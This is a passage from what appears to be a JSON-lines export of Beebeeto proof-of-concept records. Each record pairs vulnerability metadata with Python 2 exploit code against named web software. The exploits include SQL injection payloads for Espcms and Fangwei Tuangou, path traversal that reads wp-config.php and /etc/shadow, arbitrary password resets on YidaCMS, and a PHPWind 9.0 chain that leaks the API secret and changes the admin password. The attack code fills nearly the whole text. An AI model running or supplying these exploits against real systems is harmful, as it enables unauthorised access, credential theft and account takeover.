'\u91cd\u7f6e\u5bc6\u7801\u65f6\u6ca1\u6709\u5bf9\u5e10\u53f7\u548c\u539f\u5bc6\u7801\u8fdb\u884c\u6821\u9a8c,\u5bfc\u81f4\u53ef\u4ee5\u4efb\u610f\u91cd\u7f6e\u4efb\u4f55\u7528\u6237\u5bc6\u7801',\r\n 'references': ['http://www.wooyun.org/bugs/wooyun-2014-073901',\r\n ],\r\n },\r\n }\r\n\r\n\r\n @classmethod\r\n def exploit(cls, args):\r\n vul_path = '%s/user/user.asp?yidacms=password&id=3'\r\n verify_url = vul_path % args['options']['target']\r\n\r\n data = {\r\n 'shuaiweb_userpass':'[email protected]',\r\n 'shuaiweb_userpass2':'[email protected]',\r\n 'shuaiweb_useremail':'[email protected]',\r\n 'shuaiweb_username': urllib.unquote('%CE%D2%B7%AE%BB%AA'),\r\n 'shuaiweb_usertel': '',\r\n 'shuaiweb_userqq': '',\r\n 'shuaiweb_usermsn': '',\r\n 'shuaiweb_useraddress': ''\r\n }\r\n\r\n if args['options']['verbose']:\r\n print '[*] Request URL: ' + verify_url\r\n\r\n response = requests.post(verify_url, data=data)\r\n content = response.content\r\n if u'alert(\\'\u4fee\u6539\u6210\u529f\uff01\\');location.replace(\\'user_pass.asp\\')' in content.decode('GBK'):\r\n args['success'] = True\r\n args['poc_ret']['vul_url'] = verify_url\r\n args['poc_ret']['password'] = '[email protected]'\r\n return args\r\n\r\n\r\n verify = exploit\r\n\r\n\r\nif __name__ == \"__main__\":\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())", "desc": "\u91cd\u7f6e\u5bc6\u7801\u65f6\u6ca1\u6709\u5bf9\u5e10\u53f7\u548c\u539f\u5bc6\u7801\u8fdb\u884c\u6821\u9a8c,\u5bfc\u81f4\u53ef\u4ee5\u4efb\u610f\u91cd\u7f6e\u4efb\u4f55\u7528\u6237\u5bc6\u7801", "app_name": "yidacms", "id": "poc-2014-0217", "layer4_protocol": null}
{"create_date": "2014-12-22 17:32:12", "name": "Misfortune Cookie(CVE-2014-9222) POC", "level": "\u9ad8\u5371", "batchable": 1, "author": "e3rp4y", "rank": 5, "port": null, "vul_type": "\u5176\u4ed6\u7c7b\u578b", "tag": "Misfortune Cookie,RomPager,\u5384\u8fd0Cookie\u6f0f\u6d1e,CVE-2014-9222", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport re\r\nimport urllib2\r\n\r\nfrom baseframe import BaseFrame\r\nfrom distutils.version import LooseVersion\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2014-0215',\r\n 'name': 'Misfortune Cookie(CVE-2014-9222) POC',\r\n 'author': 'e3rp4y',\r\n 'create_date': '2014-12-22',\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'http',\r\n 'port': [80],\r\n 'layer4_protocol': ['tcp'],\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': 'Route',\r\n 'vul_version': ['<=4.34'],\r\n 'type': 'Other',\r\n 'tag': ['Misfortune Cookie', 'RomPager', '\u5384\u8fd0Cookie\u6f0f\u6d1e', 'CVE-2014-9222'],\r\n 'desc': '\u653b\u51fb\u8005\u80fd\u591f\u5229\u7528Misfortune Cookie\u6f0f\u6d1e, \u5c06\u5e26\u6709\u653b\u51fb\u8d1f\u8f7d\u7684cookie\u53d1\u9001\u5230\u670d\u52a1\u7aef, \u83b7\u53d6\u7ba1\u7406\u5458\u63a7\u5236\u6743\u9650',\r\n 'references': [\r\n 'http://mis.fortunecook.ie/',\r\n 'https://news.ycombinator.com/item?id=8770662',\r\n ],\r\n },\r\n }\r\n\r\n\r\n @classmethod\r\n def verify(cls, args):\r\n verify_url = '%s/Allegro' % args['options']['target']\r\n req = urllib2.Request(verify_url)\r\n if args['options']['verbose']:\r\n print '[*] Request URL: ' + verify_url\r\n content = urllib2.urlopen(req).read()\r\n ver = re.findall('RomPager Advanced Version (\\d+\\.\\d+)<br>', content)\r\n if ver and '<title>Allegro Copyright</title>' in content:\r\n if LooseVersion(ver[0]) < LooseVersion('4.34'):\r\n args['success'] = True\r\n args['poc_ret']['vul_url'] = verify_url\r\n else:\r\n args['success'] = False\r\n return args\r\n\r\n exploit = verify\r\n\r\n\r\nif __name__ == '__main__':\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())", "desc": "\u653b\u51fb\u8005\u80fd\u591f\u5229\u7528Misfortune Cookie\u6f0f\u6d1e, \u5c06\u5e26\u6709\u653b\u51fb\u8d1f\u8f7d\u7684cookie\u53d1\u9001\u5230\u670d\u52a1\u7aef, \u83b7\u53d6\u7ba1\u7406\u5458\u63a7\u5236\u6743\u9650", "app_name": "Other", "id": "poc-2014-0215", "layer4_protocol": null}
{"create_date": "2014-12-19 18:54:19", "name": "\u65b9\u7ef4\u56e2\u8d2d v4.3 /app/source/goods_list.php SQL\u6ce8\u5165\u6f0f\u6d1e POC", "level": "\u4e2d\u5371", "batchable": 1, "author": "beebeeto", "rank": 3, "port": null, "vul_type": "SQL\u6ce8\u5165", "tag": "\u65b9\u7ef4\u56e2\u8d2d4.3\u6f0f\u6d1e,SQL\u6ce8\u5165\u6f0f\u6d1e,/app/source/goods_list.php,php", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport urllib2\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2014-0212',\r\n 'name': '\u65b9\u7ef4\u56e2\u8d2d v4.3 /app/source/goods_list.php SQL\u6ce8\u5165\u6f0f\u6d1e POC',\r\n 'author': 'xiangshou',\r\n 'create_date': '2014-12-19',\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'http',\r\n 'port': [80],\r\n 'layer4_protocol': ['tcp'],\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': '\u65b9\u7ef4\u56e2\u8d2d',\r\n 'vul_version': ['4.3'],\r\n 'type': 'SQL Injection',\r\n 'tag': ['\u65b9\u7ef4\u56e2\u8d2d4.3\u6f0f\u6d1e', 'SQL\u6ce8\u5165\u6f0f\u6d1e', '/app/source/goods_list.php', 'php'],\r\n 'desc': '\u65b9\u7ef4\u56e2\u8d2d v4.3 /app/source/goods_list.php\uff0cid\u9020\u6210\u4e86\u6ce8\u5165',\r\n 'references': ['http://sebug.net/vuldb/ssvid-87131',\r\n ],\r\n },\r\n }\r\n\r\n\r\n @classmethod\r\n def verify(cls, args):\r\n payload = \"/index.php?m=Goods&a=showcate&id=103%20UNION%20ALL%20SELECT%20CONCAT%28md5%28333%29%29%23\"\r\n verify_url = args['options']['target'] + payload\r\n req = urllib2.Request(verify_url)\r\n if args['options']['verbose']:\r\n print '[*] Request URL: ' + verify_url\r\n content = urllib2.urlopen(req).read()\r\n if '310dcbbf4cce62f762a2aaa148d556bd' in content:\r\n args['success'] = True\r\n args['poc_ret']['vul_url'] = verify_url\r\n return args\r\n\r\n exploit = verify\r\n\r\n\r\nif __name__ == '__main__':\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())", "desc": "\u65b9\u7ef4\u56e2\u8d2d v4.3 /app/source/goods_list.php\uff0cid\u9020\u6210\u4e86\u6ce8\u5165", "app_name": "\u65b9\u7ef4\u56e2\u8d2d", "id": "poc-2014-0212", "layer4_protocol": null}
{"create_date": "2014-12-18 20:52:06", "name": "eYou v4 /php/report/include/config.inc \u4fe1\u606f\u6cc4\u9732\u6f0f\u6d1e POC", "level": "\u4e2d\u5371", "batchable": 1, "author": "beebeeto", "rank": 3, "port": null, "vul_type": "\u4fe1\u606f\u6cc4\u6f0f", "tag": "eYou,\u654f\u611f\u4fe1\u606f\u6cc4\u6f0f,/php/report/include/config.inc,php", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport urllib2\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2014-0211',\r\n 'name': 'eYou v4 /php/report/include/config.inc \u4fe1\u606f\u6cc4\u9732\u6f0f\u6d1e POC',\r\n 'author': 'xiangshou',\r\n 'create_date': '2014-12-18',\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'http',\r\n 'port': [80],\r\n 'layer4_protocol': ['tcp'],\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': 'eyou',\r\n 'vul_version': ['4'],\r\n 'type': 'Information Disclosure',\r\n 'tag': ['eYou', '\u654f\u611f\u4fe1\u606f\u6cc4\u6f0f', '/php/report/include/config.inc', 'php'],\r\n 'desc': '\u6f0f\u6d1e\u6587\u4ef6\uff1a/php/report/include/config.inc',\r\n 'references': ['http://wooyun.org/bugs/wooyun-2014-058462',\r\n ],\r\n },\r\n }\r\n\r\n\r\n @classmethod\r\n def verify(cls, args):\r\n payload = '/php/report/include/config.inc'\r\n verify_url = args['options']['target'] + payload\r\n req = urllib2.Request(verify_url)\r\n if args['options']['verbose']:\r\n print '[*] Request URL: ' + verify_url\r\n content = urllib2.urlopen(req).read()\r\n if 'MYSQL_USER' in content and 'MYSQL_PASS' in content:\r\n args['success'] = True\r\n args['poc_ret']['vul_url']= verify_url\r\n return args\r\n\r\n exploit = verify\r\n\r\n\r\nif __name__ == '__main__':\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())", "desc": "\u6f0f\u6d1e\u6587\u4ef6\uff1a/php/report/include/config.inc", "app_name": "eYou", "id": "poc-2014-0211", "layer4_protocol": null}
{"create_date": "2014-12-18 00:53:49", "name": "WordPress DB-Backup Plugin 4.5 /download.php \u4efb\u610f\u6587\u4ef6\u4e0b\u8f7d\u6f0f\u6d1e Exploit", "level": "\u9ad8\u5371", "batchable": 1, "author": "foundu", "rank": 6, "port": null, "vul_type": "\u4efb\u610f\u6587\u4ef6\u4e0b\u8f7d", "tag": "WordPress DB Backup\u6f0f\u6d1e,CVE-2014-9119,\u4efb\u610f\u6587\u4ef6\u4e0b\u8f7d\u6f0f\u6d1e,php", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport urllib2\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2014-0209',\r\n 'name': 'WordPress DB-Backup Plugin 4.5 /download.php \u4efb\u610f\u6587\u4ef6\u4e0b\u8f7d\u6f0f\u6d1e Exploit',\r\n 'author': 'foundu',\r\n 'create_date': '2014-12-18',\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'http',\r\n 'port': [80],\r\n 'layer4_protocol': ['tcp'],\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': 'WordPress',\r\n 'vul_version': ['4.5'],\r\n 'type': 'Arbitrary File Download',\r\n 'tag': ['WordPress DB Backup\u6f0f\u6d1e', 'CVE-2014-9119', '\u4efb\u610f\u6587\u4ef6\u4e0b\u8f7d\u6f0f\u6d1e', 'php'],\r\n 'desc': '''\r\n DB Backup plugin for WordPress contains a flaw that allows traversing outside of\r\n a restricted path. The issue is due to the download.php script not properly\r\n sanitizing user input, specifically path traversal style attacks (e.g. '../').\r\n With a specially crafted request, a remote attacker can gain read access to\r\n arbitrary files, limited by system operational access control. This\r\n vulnerability can be used to get WordPress authentication keys and salts,\r\n database address and credentials, which can be used in certain environments to\r\n elevate privileges and execute malicious PHP code.\r\n\r\n Root cause:\r\n Unsanitized user input to readfile() function.\r\n ''',\r\n 'references': ['http://seclists.org/oss-sec/2014/q4/1059',\r\n ],\r\n },\r\n }\r\n\r\n\r\n @classmethod\r\n def exploit(cls, args):\r\n payload = '/wp-content/plugins/db-backup/download.php?file=../../../wp-config.php'\r\n verify_url = args['options']['target'] + payload\r\n req = urllib2.Request(verify_url)\r\n if args['options']['verbose']:\r\n print '[*] Request URL: ' + verify_url\r\n content = urllib2.urlopen(req).read()\r\n if 'DB_PASSWORD' in content and 'wp-settings.php' in content:\r\n args['success'] = True\r\n args['poc_ret']['vul_url'] = verify_url\r\n return args\r\n\r\n verify = exploit\r\n\r\n\r\nif __name__ == '__main__':\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())", "desc": "DB Backup plugin for WordPress contains a flaw that allows traversing outside of\r\na restricted path. The issue is due to the download.php script not properly\r\nsanitizing user input, specifically path traversal style attacks (e.g. '../').\r\nWith a specially crafted request, a remote attacker can gain read access to\r\narbitrary files, limited by system operational access control. This\r\nvulnerability can be used to get WordPress authentication keys and salts,\r\ndatabase address and credentials, which can be used in certain environments to\r\nelevate privileges and execute malicious PHP code.\r\n\r\nRoot cause:\r\nUnsanitized user input to readfile() function.", "app_name": "WordPress", "id": "poc-2014-0209", "layer4_protocol": null}
{"create_date": "2014-12-16 20:04:21", "name": "Espcms v5.0 /index.php SQL\u6ce8\u5165\u6f0f\u6d1e POC", "level": "\u4e2d\u5371", "batchable": 1, "author": "H4rdy", "rank": 3, "port": null, "vul_type": "SQL\u6ce8\u5165", "tag": "Espcms 5.0 \u6f0f\u6d1e,SQL\u6ce8\u5165\u6f0f\u6d1e,/index.php,php", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport re\r\nimport urllib2\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2014-0208',\r\n 'name': 'Espcms v5.0 /index.php SQL\u6ce8\u5165\u6f0f\u6d1e POC',\r\n 'author': 'H4rdy',\r\n 'create_date': '2014-12-16',\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'http',\r\n 'port': [80],\r\n 'layer4_protocol': ['tcp'],\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': 'Espcms',\r\n 'vul_version': ['5.0'],\r\n 'type': 'SQL Injection',\r\n 'tag': ['Espcms 5.0 \u6f0f\u6d1e', 'SQL\u6ce8\u5165\u6f0f\u6d1e', '/index.php', 'php'],\r\n 'desc': 'Espcms v5.0 /index.php\uff0ctagkey\u9020\u6210\u4e86\u6ce8\u5165',\r\n 'references': ['http://www.wooyun.org/bugs/wooyun-2013-019995',\r\n ],\r\n },\r\n }\r\n\r\n\r\n @classmethod\r\n def verify(cls, args):\r\n payload = (\"/index.php?ac=search&at=taglist&tagkey=%2527,tags%29%20or%28select%201%20from%28select\"\r\n \"%20count%28*%29,concat%28%28select%20%28select%20concat%28md5%283.1415%29%29%29%20from\"\r\n \"%20information_schema.tables%20where%20table_schema=database%28%29%20limit%200,1%29,\"\r\n \"floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29%23\")\r\n verify_url = args['options']['target'] + payload\r\n req = urllib2.Request(verify_url)\r\n if args['options']['verbose']:\r\n print '[*] Request URL: ' + verify_url\r\n content = urllib2.urlopen(req).read()\r\n if \"63e1f04640e83605c1d177544a5a0488\" in content:\r\n args['success'] = True\r\n args['poc_ret']['vul_url'] = verify_url\r\n return args\r\n\r\n exploit = verify\r\n\r\n\r\nif __name__ == '__main__':\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())", "desc": "Espcms v5.0 /index.php\uff0ctagkey\u9020\u6210\u4e86\u6ce8\u5165", "app_name": "Espcms", "id": "poc-2014-0208", "layer4_protocol": null}
{"create_date": "2014-12-16 18:28:31", "name": "NS-ASG /commonplugin-Download.php \u4efb\u610f\u6587\u4ef6\u4e0b\u8f7d\u6f0f\u6d1e POC", "level": "\u9ad8\u5371", "batchable": 1, "author": "beebeeto", "rank": 3, "port": null, "vul_type": "\u4efb\u610f\u6587\u4ef6\u4e0b\u8f7d", "tag": "NS-ASG\u6f0f\u6d1e,\u4efb\u610f\u6587\u4ef6\u4e0b\u8f7d\u6f0f\u6d1e,/commonplugin-Download.php,php", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport urllib2\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2014-0207',\r\n 'name': 'NS-ASG /commonplugin-Download.php \u4efb\u610f\u6587\u4ef6\u4e0b\u8f7d\u6f0f\u6d1e POC',\r\n 'author': 'xiangshou',\r\n 'create_date': '2014-12-15',\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'http',\r\n 'port': [80],\r\n 'layer4_protocol': ['tcp'],\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': 'NS-ASG',\r\n 'vul_version': '*',\r\n 'type': 'Arbitrary File Download',\r\n 'tag': ['NS-ASG\u6f0f\u6d1e', '\u4efb\u610f\u6587\u4ef6\u4e0b\u8f7d\u6f0f\u6d1e', '/commonplugin-Download.php', 'php'],\r\n 'desc': 'N/A',\r\n 'references': ['http://wooyun.org/bugs/wooyun-2014-058838',\r\n ]\r\n },\r\n }\r\n\r\n\r\n @classmethod\r\n def verify(cls, args):\r\n payload = '/commonplugin/Download.php?licensefile=../../../../../../../../../../etc/shadow'\r\n verify_url = args['options']['target'] + payload\r\n req = urllib2.Request(verify_url)\r\n if args['options']['verbose']:\r\n print '[*] Request URL: ' + verify_url\r\n content = urllib2.urlopen(req).read()\r\n if 'root:' in content and 'nobody:' in content:\r\n args['success'] = True\r\n args['poc_ret']['vul_url'] = verify_url\r\n return args\r\n\r\n\r\n exploit = verify\r\n\r\n\r\nif __name__ == '__main__':\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())", "desc": "N/A", "app_name": "Other", "id": "poc-2014-0207", "layer4_protocol": null}
{"create_date": "2014-12-13 00:54:14", "name": "PHPWind 9.0 /src/windid/service/user/srv/WindidUserService.php \u8fdc\u7a0b\u5bc6\u7801\u4fee\u6539\u6f0f\u6d1e POC & Exploit", "level": "\u9ad8\u5371", "batchable": 0, "author": "Evi1m0", "rank": 7, "port": null, "vul_type": "\u8fdc\u7a0b\u5bc6\u7801\u4fee\u6539", "tag": "phpwind\u6f0f\u6d1e,\u8fdc\u7a0b\u5bc6\u7801\u4fee\u6539\u6f0f\u6d1e,/WindidUserService.php,php", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport re\r\nimport time\r\nimport json\r\nimport urllib\r\nimport urllib2\r\n\r\n\r\nfrom hashlib import md5\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2014-0204',\r\n 'name': 'PHPWind 9.0 /src/windid/service/user/srv/WindidUserService.php \u8fdc\u7a0b\u5bc6\u7801\u4fee\u6539\u6f0f\u6d1e POC & Exploit',\r\n 'author': 'Evi1m0',\r\n 'create_date': '2014-12-13',\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'http',\r\n 'port': [80],\r\n 'layer4_protocol': ['tcp'],\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': 'phpwind',\r\n 'vul_version': ['9.0'],\r\n 'type': 'Remote Password Change',\r\n 'tag': ['phpwind\u6f0f\u6d1e', '\u8fdc\u7a0b\u5bc6\u7801\u4fee\u6539\u6f0f\u6d1e', '/WindidUserService.php', 'php'],\r\n 'desc': '''\r\n phpwind v9.0\u7248\u672c\u4e2d\u4e0a\u4f20\u5934\u50cf\u5904\u8bef\u5c06\u8bbf\u95eeapi\u7684\u5bc6\u94a5\u6cc4\u9732\uff0c\u5bfc\u81f4 secretkey \u6cc4\u9732\uff0c\u5bfc\u81f4\u53ef\u901a\u8fc7api\u4efb\u610f\u4fee\u6539\u5bc6\u7801\u3002\r\n ''',\r\n 'references': ['http://www.wooyun.org/bugs/wooyun-2014-072727',\r\n ],\r\n },\r\n }\r\n\r\n\r\n # The need for -c (cookie) parameters\r\n def _init_user_parser(self):\r\n self.user_parser.add_option('-c','--cookie',\r\n action='store', dest='cookie', type='string', default=None,\r\n help='this poc need to login, so special cookie '\r\n 'for target must be included in http headers.')\r\n\r\n\r\n @classmethod\r\n def verify(cls, args):\r\n url = args['options']['target']\r\n headers_cookie = {\"Cookie\":args['options']['cookie']}\r\n windidkey_url = '%s/index.php?m=profile&c=avatar&_left=avatar' % url\r\n secretkey_url = '%s/windid/index.php?m=api&c=app&a=list&uid=%s&windidkey=%s&time=%s&clientid=1&type=flash'\r\n # Regex\r\n match_uid = re.compile('m=space&uid=([\\d])+')\r\n match_windidkey = re.compile('windidkey%3D([\\w\\d]{32})%26time%3D([\\d]+)%26')\r\n if args['options']['verbose']:\r\n print '[*] %s - Trying to get secret key' % url\r\n request = urllib2.Request(windidkey_url, headers=headers_cookie)\r\n response = urllib2.urlopen(request).read()\r\n\r\n # Get windidkey\r\n try:\r\n windidkey, _time = match_windidkey.findall(response)[0]\r\n uid = match_uid.findall(response)[0]\r\n except:\r\n return args\r\n\r\n # Get secretkey\r\n request = urllib2.Request(secretkey_url % (url, uid, windidkey, _time), data='uid=undefined')\r\n response = json.loads(urllib2.urlopen(request).read())\r\n try:\r\n secretkey = response['1']['secretkey']\r\n except:\r\n return args\r\n\r\n # Success\r\n if secretkey:\r\n args['success'] = True\r\n args['poc_ret']['vul_url'] = url\r\n args['poc_ret']['secretkey'] = secretkey\r\n return args\r\n\r\n\r\n @classmethod\r\n def exploit(cls, args):\r\n url = args['options']['target']\r\n headers_cookie = {\"Cookie\":args['options']['cookie']}\r\n vul_url = '%s/windid/index.php?m=api&c=user&a=%s&windidkey=%s&time=%s&clientid=1&userid=1'\r\n windidkey_url = '%s/index.php?m=profile&c=avatar&_left=avatar' % url\r\n secretkey_url = '%s/windid/index.php?m=api&c=app&a=list&uid=%s&windidkey=%s&time=%s&clientid=1&type=flash'\r\n # Regex\r\n match_uid = re.compile('m=space&uid=([\\d])+')\r\n match_windidkey = re.compile('windidkey%3D([\\w\\d]{32})%26time%3D([\\d]+)%26')\r\n if args['options']['verbose']:\r\n print '[*] %s - Trying to get secret key' % url\r\n request = urllib2.Request(windidkey_url, headers=headers_cookie)\r\n response = urllib2.urlopen(request).read()\r\n\r\n # Get windidkey\r\n try:\r\n windidkey, _time = match_windidkey.findall(response)[0]\r\n uid = match_uid.findall(response)[0]\r\n except:\r\n return args\r\n\r\n # Get secretkey\r\n request = urllib2.Request(secretkey_url % (url, uid, windidkey, _time), data='uid=undefined')\r\n response = json.loads(urllib2.urlopen(request).read())\r\n try:\r\n secretkey = response['1']['secretkey']\r\n except:\r\n return args\r\n if args['options']['verbose']:\r\n print '[*] %s - The secret key is %s' % (url, secretkey)\r\n\r\n # Get username\r\n if args['options']['verbose']:\r\n print '[*] %s - Getting Username ...' % url\r\n data = {'uid': 1}\r\n string = 'userid1uid1'\r\n _time = str(int(time.time()))\r\n app_key = md5('%s%s%s' % (md5('1||%s' % secretkey).hexdigest(), _time, string)).hexdigest()\r\n request = urllib2.Request(vul_url % (url, 'get', app_key, _time), data=urllib.urlencode(data))\r\n response = json.loads(urllib2.urlopen(request).read())\r\n try:\r\n username = response[u'username']\r\n except:\r\n return args\r\n if args['options']['verbose']:\r\n print '[*] %s - The Username is %s' % (url, username)\r\n\r\n # Change password\r\n if args['options']['verbose']:\r\n print '[*] %s - Trying to change the %s\\'s password ...' % (url ,username)\r\n data = {'password': 'PASSW0RD', 'uid': 1}\r\n string = 'userid1passwordPASSW0RDuid1'\r\n _time = str(int(time.time()))\r\n app_key = md5('%s%s%s' % (md5('1||%s' % secretkey).hexdigest(), _time, string)).hexdigest()\r\n request = urllib2.Request(vul_url % (url, 'editUser', app_key, _time), data=urllib.urlencode(data))\r\n response = urllib2.urlopen(request).read()\r\n\r\n # Success\r\n if response == '1':\r\n args['success'] = True\r\n args['poc_ret']['vul_url'] = url\r\n args['poc_ret']['secretkey'] = secretkey\r\n args['poc_ret']['username'] = username\r\n args['poc_ret']['password'] = 'PASSW0RD'\r\n return args\r\n\r\n\r\n\r\nif __name__ == '__main__':\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())", "desc": "phpwind v9.0\u7248\u672c\u4e2d\u4e0a\u4f20\u5934\u50cf\u5904\u8bef\u5c06\u8bbf\u95eeapi\u7684\u5bc6\u94a5\u6cc4\u9732\uff0c\u5bfc\u81f4 secretkey \u6cc4\u9732\uff0c\u5bfc\u81f4\u53ef\u901a\u8fc7api\u4efb\u610f\u4fee\u6539\u5bc6\u7801\u3002", "app_name": "PHPWind", "id": "poc-2014-0204", "layer4_protocol": null}
{"create_date": "2014-12-11 01:09:34", "name": "phpwind 9.0 /res/js/dev/util_libs/jPlayer/Jplayer.swf \u8de8\u7ad9\u811a\u672c\u6f0f\u6d1e POC", "level": "\u4f4e\u5371", "batchable": 1, "author": "tmp", "rank": 1, "port": null, "vul_type": "\u8de8\u7ad9\u6f0f\u6d1e", "tag": "phpwind\u6f0f\u6d1e,xss\u6f0f\u6d1e,flash xss,php", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport md5\r\nimport urllib2\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2014-0201',\r\n 'name': 'phpwind 9.0 /res/js/dev/util_libs/jPlayer/Jplayer.swf \u8de8\u7ad9\u811a\u672c\u6f0f\u6d1e POC',\r\n 'author': 'tmp',\r\n 'create_date': '2014-12-11',\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'http',\r\n 'port': [80],\r\n 'layer4_protocol': ['tcp'],\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': 'phpwind',\r\n 'vul_version': ['9.0'],\r\n 'type': 'Cross Site Scripting',\r\n 'tag': ['phpwind\u6f0f\u6d1e', 'xss\u6f0f\u6d1e', 'flash xss', 'php'],\r\n 'desc': 'N/A',\r\n 'references': ['http://wooyun.org/bugs/wooyun-2013-017733',\r\n ],\r\n },\r\n }\r\n\r\n @classmethod\r\n def verify(cls, args):\r\n flash_md5 = \"769d053b03973d380da80be5a91c59c2\"\r\n file_path = \"/res/js/dev/util_libs/jPlayer/Jplayer.swf\"\r\n verify_url = args['options']['target'] + file_path\r\n\r\n if args['options']['verbose']:\r\n print '[*] Request URL: ' + verify_url\r\n\r\n request = urllib2.Request(verify_url)\r\n response = urllib2.urlopen(request)\r\n content = response.read()\r\n md5_value = md5.new(content).hexdigest()\r\n\r\n if md5_value in flash_md5:\r\n args['success'] = True\r\n args['poc_ret']['xss_url'] = verify_url + '?jQuery=alert(1))}catch(e){}//'\r\n return args\r\n return args\r\n\r\n exploit = verify\r\n\r\n\r\nif __name__ == '__main__':\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())", "desc": "N/A", "app_name": "phpcms", "id": "poc-2014-0201", "layer4_protocol": null}
